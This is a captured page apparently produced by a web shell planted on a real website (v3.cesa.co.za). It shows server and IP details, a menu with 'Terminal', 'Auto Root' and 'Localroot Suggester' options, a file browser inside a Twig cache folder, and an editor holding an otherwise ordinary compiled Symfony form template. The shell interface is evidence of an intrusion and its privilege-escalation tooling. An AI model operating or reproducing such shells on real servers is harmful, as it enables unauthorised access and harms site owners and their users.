Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
var /
cache /
.!!QgY /
twig /
1e /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
1e14da99b55d1d5e4e7e0917cc0869ab.php
1.62
MB
-rwxrwxr-x
2026-05-18 12:54
1e46fce8a2ff70b8c5b9a558cd7194c0.php
17.59
KB
-rwxrwxr-x
2026-05-18 12:54
1e5882fad15ef4fcff64251143259779.php
3.28
KB
-rwxrwxr-x
2026-05-18 12:54
1e6fd864802c05cd7d72e2ca3f846dc6.php
4.56
KB
-rwxrwxr-x
2026-05-18 12:54
1ed6ff5d13e518887530dfce254f1b32.php
8.48
KB
-rwxrwxr-x
2026-05-18 12:54
Save
Rename
<?php use Twig\Environment; use Twig\Error\LoaderError; use Twig\Error\RuntimeError; use Twig\Extension\CoreExtension; use Twig\Extension\SandboxExtension; use Twig\Markup; use Twig\Sandbox\SecurityError; use Twig\Sandbox\SecurityNotAllowedTagError; use Twig\Sandbox\SecurityNotAllowedFilterError; use Twig\Sandbox\SecurityNotAllowedFunctionError; use Twig\Source; use Twig\Template; use Twig\TemplateWrapper; /* bootstrap_4_horizontal_layout.html.twig */ class __TwigTemplate_a2f4058657e47872c2e69ae760db1ef0 extends Template { private Source $source; /** * @var array<string, Template> */ private array $macros = []; public function __construct(Environment $env) { parent::__construct($env); $this->source = $this->getSourceContext(); $this->parent = false; // line 1 $_trait_0 = $this->load("bootstrap_4_layout.html.twig", 1); if (!$_trait_0->unwrap()->isTraitable()) { throw new RuntimeError('Template "'."bootstrap_4_layout.html.twig".'" cannot be used as a trait.', 1, $this->source); } $_trait_0_blocks = $_trait_0->unwrap()->getBlocks(); $this->traits = $_trait_0_blocks; $this->blocks = array_merge( $this->traits, [ 'form_label' => [$this, 'block_form_label'], 'form_label_class' => [$this, 'block_form_label_class'], 'form_row' => [$this, 'block_form_row'], 'fieldset_form_row' => [$this, 'block_fieldset_form_row'], 'submit_row' => [$this, 'block_submit_row'], 'reset_row' => [$this, 'block_reset_row'], 'form_group_class' => [$this, 'block_form_group_class'], 'checkbox_row' => [$this, 'block_checkbox_row'], ] ); } protected function doDisplay(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 2 yield " "; // line 4 yield " "; // line 5 yield from $this->unwrap()->yieldBlock('form_label', $context, $blocks); // line 17 yield " "; // line 18 yield from $this->unwrap()->yieldBlock('form_label_class', $context, $blocks); // line 21 yield " "; // line 23 yield " "; // line 24 yield from $this->unwrap()->yieldBlock('form_row', $context, $blocks); // line 41 yield " "; // line 42 yield from $this->unwrap()->yieldBlock('fieldset_form_row', $context, $blocks); // line 58 yield " "; // line 59 yield from $this->unwrap()->yieldBlock('submit_row', $context, $blocks); // line 67 yield " "; // line 68 yield from $this->unwrap()->yieldBlock('reset_row', $context, $blocks); // line 76 yield " "; // line 77 yield from $this->unwrap()->yieldBlock('form_group_class', $context, $blocks); // line 80 yield " "; // line 81 yield from $this->unwrap()->yieldBlock('checkbox_row', $context, $blocks); yield from []; } // line 5 /** * @return iterable<null|scalar|\Stringable> */ public function block_form_label(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 6 if ((($context["label"] ?? null) === false)) { // line 7 yield "<div class=\""; yield from $this->unwrap()->yieldBlock("form_label_class", $context, $blocks); yield "\"></div>"; } else { // line 9 if (( !array_key_exists("expanded", $context) || !($context["expanded"] ?? null))) { // line 10 $context["label_attr"] = Twig\Extension\CoreExtension::merge(($context["label_attr"] ?? null), ["class" => Twig\Extension\CoreExtension::trim((((CoreExtension::getAttribute($this->env, $this->source, ($context["label_attr"] ?? null), "class", [], "any", true, true, false, 10)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["label_attr"] ?? null), "class", [], "any", false, false, false, 10), "")) : ("")) . " col-form-label"))]); } // line 12 yield "<div class=\""; yield from $this->unwrap()->yieldBlock("form_label_class", $context, $blocks); yield "\">"; // line 13 yield from $this->yieldParentBlock("form_label", $context, $blocks); // line 14 yield "</div>"; } yield from []; } // line 18 /** * @return iterable<null|scalar|\Stringable> */ public function block_form_label_class(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 19 yield "col-sm-2"; yield from []; } // line 24 /** * @return iterable<null|scalar|\Stringable> */ public function block_form_row(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 25 if ((array_key_exists("expanded", $context) && ($context["expanded"] ?? null))) { // line 26 yield from $this->unwrap()->yieldBlock("fieldset_form_row", $context, $blocks); } else { // line 28 $context["widget_attr"] = []; // line 29 if ((($tmp = !Twig\Extension\CoreExtension::testEmpty(($context["help"] ?? null))) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 30 $context["widget_attr"] = ["attr" => ["aria-describedby" => (($context["id"] ?? null) . "_help")]]; } // line 32 yield "<div"; $_v0 = $context; $_v1 = ["attr" => Twig\Extension\CoreExtension::merge(($context["row_attr"] ?? null), ["class" => Twig\Extension\CoreExtension::trim(((((CoreExtension::getAttribute($this->env, $this->source, ($context["row_attr"] ?? null), "class", [], "any", true, true, false, 32)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["row_attr"] ?? null), "class", [], "any", false, false, false, 32), "")) : ("")) . " form-group row") . (((( !($context["compound"] ?? null) || ((array_key_exists("force_error", $context)) ? (Twig\Extension\CoreExtension::default(($context["force_error"] ?? null), false)) : (false))) && !($context["valid"] ?? null))) ? (" is-invalid") : (""))))])]; if (!is_iterable($_v1)) { throw new RuntimeError('Variables passed to the "with" tag must be a mapping.', 32, $this->getSourceContext()); } $_v1 = CoreExtension::toArray($_v1); $context = $_v1 + $context + $this->env->getGlobals(); yield from $this->unwrap()->yieldBlock("attributes", $context, $blocks); $context = $_v0; yield ">"; // line 33 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'label'); // line 34 yield "<div class=\""; yield from $this->unwrap()->yieldBlock("form_group_class", $context, $blocks); yield "\">"; // line 35 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'widget', ($context["widget_attr"] ?? null)); // line 36 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'help'); // line 37 yield "</div> "; // line 38 yield "</div>"; } yield from []; } // line 42 /** * @return iterable<null|scalar|\Stringable> */ public function block_fieldset_form_row(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 43 $context["widget_attr"] = []; // line 44 if ((($tmp = !Twig\Extension\CoreExtension::testEmpty(($context["help"] ?? null))) && $tmp instanceof Markup ? (string) $tmp : $tmp)) { // line 45 $context["widget_attr"] = ["attr" => ["aria-describedby" => (($context["id"] ?? null) . "_help")]]; } // line 47 yield "<fieldset"; $_v2 = $context; $_v3 = ["attr" => Twig\Extension\CoreExtension::merge(($context["row_attr"] ?? null), ["class" => Twig\Extension\CoreExtension::trim((((CoreExtension::getAttribute($this->env, $this->source, ($context["row_attr"] ?? null), "class", [], "any", true, true, false, 47)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["row_attr"] ?? null), "class", [], "any", false, false, false, 47), "")) : ("")) . " form-group"))])]; if (!is_iterable($_v3)) { throw new RuntimeError('Variables passed to the "with" tag must be a mapping.', 47, $this->getSourceContext()); } $_v3 = CoreExtension::toArray($_v3); $context = $_v3 + $context + $this->env->getGlobals(); yield from $this->unwrap()->yieldBlock("attributes", $context, $blocks); $context = $_v2; yield "> <div class=\"row"; // line 48 if ((( !($context["compound"] ?? null) || ((array_key_exists("force_error", $context)) ? (Twig\Extension\CoreExtension::default(($context["force_error"] ?? null), false)) : (false))) && !($context["valid"] ?? null))) { yield " is-invalid"; } yield "\">"; // line 49 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'label'); // line 50 yield "<div class=\""; yield from $this->unwrap()->yieldBlock("form_group_class", $context, $blocks); yield "\">"; // line 51 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'widget', ($context["widget_attr"] ?? null)); // line 52 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'help'); // line 53 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'errors'); // line 54 yield "</div> </div> "; // line 56 yield "</fieldset>"; yield from []; } // line 59 /** * @return iterable<null|scalar|\Stringable> */ public function block_submit_row(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 60 yield "<div"; $_v4 = $context; $_v5 = ["attr" => Twig\Extension\CoreExtension::merge(($context["row_attr"] ?? null), ["class" => Twig\Extension\CoreExtension::trim((((CoreExtension::getAttribute($this->env, $this->source, ($context["row_attr"] ?? null), "class", [], "any", true, true, false, 60)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["row_attr"] ?? null), "class", [], "any", false, false, false, 60), "")) : ("")) . " form-group row"))])]; if (!is_iterable($_v5)) { throw new RuntimeError('Variables passed to the "with" tag must be a mapping.', 60, $this->getSourceContext()); } $_v5 = CoreExtension::toArray($_v5); $context = $_v5 + $context + $this->env->getGlobals(); yield from $this->unwrap()->yieldBlock("attributes", $context, $blocks); $context = $_v4; yield ">"; // line 61 yield "<div class=\""; yield from $this->unwrap()->yieldBlock("form_label_class", $context, $blocks); yield "\"></div>"; // line 62 yield "<div class=\""; yield from $this->unwrap()->yieldBlock("form_group_class", $context, $blocks); yield "\">"; // line 63 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'widget'); // line 64 yield "</div>"; // line 65 yield "</div>"; yield from []; } // line 68 /** * @return iterable<null|scalar|\Stringable> */ public function block_reset_row(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 69 yield "<div"; $_v6 = $context; $_v7 = ["attr" => Twig\Extension\CoreExtension::merge(($context["row_attr"] ?? null), ["class" => Twig\Extension\CoreExtension::trim((((CoreExtension::getAttribute($this->env, $this->source, ($context["row_attr"] ?? null), "class", [], "any", true, true, false, 69)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["row_attr"] ?? null), "class", [], "any", false, false, false, 69), "")) : ("")) . " form-group row"))])]; if (!is_iterable($_v7)) { throw new RuntimeError('Variables passed to the "with" tag must be a mapping.', 69, $this->getSourceContext()); } $_v7 = CoreExtension::toArray($_v7); $context = $_v7 + $context + $this->env->getGlobals(); yield from $this->unwrap()->yieldBlock("attributes", $context, $blocks); $context = $_v6; yield ">"; // line 70 yield "<div class=\""; yield from $this->unwrap()->yieldBlock("form_label_class", $context, $blocks); yield "\"></div>"; // line 71 yield "<div class=\""; yield from $this->unwrap()->yieldBlock("form_group_class", $context, $blocks); yield "\">"; // line 72 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'widget'); // line 73 yield "</div>"; // line 74 yield "</div>"; yield from []; } // line 77 /** * @return iterable<null|scalar|\Stringable> */ public function block_form_group_class(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 78 yield "col-sm-10"; yield from []; } // line 81 /** * @return iterable<null|scalar|\Stringable> */ public function block_checkbox_row(array $context, array $blocks = []): iterable { $macros = $this->macros; // line 82 yield "<div"; $_v8 = $context; $_v9 = ["attr" => Twig\Extension\CoreExtension::merge(($context["row_attr"] ?? null), ["class" => Twig\Extension\CoreExtension::trim((((CoreExtension::getAttribute($this->env, $this->source, ($context["row_attr"] ?? null), "class", [], "any", true, true, false, 82)) ? (Twig\Extension\CoreExtension::default(CoreExtension::getAttribute($this->env, $this->source, ($context["row_attr"] ?? null), "class", [], "any", false, false, false, 82), "")) : ("")) . " form-group row"))])]; if (!is_iterable($_v9)) { throw new RuntimeError('Variables passed to the "with" tag must be a mapping.', 82, $this->getSourceContext()); } $_v9 = CoreExtension::toArray($_v9); $context = $_v9 + $context + $this->env->getGlobals(); yield from $this->unwrap()->yieldBlock("attributes", $context, $blocks); $context = $_v8; yield ">"; // line 83 yield "<div class=\""; yield from $this->unwrap()->yieldBlock("form_label_class", $context, $blocks); yield "\"></div>"; // line 84 yield "<div class=\""; yield from $this->unwrap()->yieldBlock("form_group_class", $context, $blocks); yield "\">"; // line 85 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'widget'); // line 86 yield $this->env->getRuntime('Symfony\Component\Form\FormRenderer')->searchAndRenderBlock(($context["form"] ?? null), 'help'); // line 87 yield "</div>"; // line 88 yield "</div>"; yield from []; } /** * @codeCoverageIgnore */ public function getTemplateName(): string { return "bootstrap_4_horizontal_layout.html.twig"; } /** * @codeCoverageIgnore */ public function getDebugInfo(): array { return array ( 374 => 88, 372 => 87, 370 => 86, 368 => 85, 364 => 84, 360 => 83, 348 => 82, 341 => 81, 336 => 78, 329 => 77, 324 => 74, 322 => 73, 320 => 72, 316 => 71, 312 => 70, 300 => 69, 293 => 68, 288 => 65, 286 => 64, 284 => 63, 280 => 62, 276 => 61, 264 => 60, 257 => 59, 252 => 56, 248 => 54, 246 => 53, 244 => 52, 242 => 51, 238 => 50, 236 => 49, 231 => 48, 218 => 47, 215 => 45, 213 => 44, 211 => 43, 204 => 42, 198 => 38, 195 => 37, 193 => 36, 191 => 35, 187 => 34, 185 => 33, 173 => 32, 170 => 30, 168 => 29, 166 => 28, 163 => 26, 161 => 25, 154 => 24, 149 => 19, 142 => 18, 136 => 14, 134 => 13, 130 => 12, 127 => 10, 125 => 9, 120 => 7, 118 => 6, 111 => 5, 106 => 81, 103 => 80, 101 => 77, 98 => 76, 96 => 68, 93 => 67, 91 => 59, 88 => 58, 86 => 42, 83 => 41, 81 => 24, 78 => 23, 75 => 21, 73 => 18, 70 => 17, 68 => 5, 65 => 4, 62 => 2, 35 => 1,); } public function getSourceContext(): Source { return new Source("", "bootstrap_4_horizontal_layout.html.twig", "/var/www/v3.cesa.co.za/vendor/symfony/twig-bridge/Resources/views/Form/bootstrap_4_horizontal_layout.html.twig"); } }